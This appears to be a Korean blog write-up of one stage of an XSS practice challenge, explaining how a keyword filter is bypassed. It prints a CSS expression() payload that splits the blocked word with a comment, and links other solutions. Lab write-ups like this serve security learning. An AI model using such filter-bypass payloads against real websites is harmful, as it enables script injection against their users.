Hint : s/(url|script|eval|expression)/xxx/ig;
역시 브라우저 문제로 의도한 대로 풀 수 없어 onclick 속성을 사용했다.
더보기
xss:expre/**/ssion(window.x?0:(alert(document.domain),window.x=1));
원래는 expression을 사용하는 것 같다. 다만 xxx로 필터링 되는 것을 막기 위해 /**/(주석)으로 우회할 수 있다.
https://mins4416.tistory.com/132
다른 풀이도 대부분 epression을 주석으로 우회하는 풀이였다.
https://blog.csdn.net/fengzilin1973/article/details/116354758
'Web Hacking > XSS challenge' 카테고리의 다른 글
| [XSS Challenges] Stage #15 (0) | 2021.06.29 |
|---|---|
| [XSS challenge] Stage #13 (0) | 2021.05.29 |
| [XSS challenge] Stage #12 (0) | 2021.05.23 |
| [XSS challenge] Stage #10 (0) | 2021.05.19 |
| [xss challenge] Stage #9 (0) | 2021.05.19 |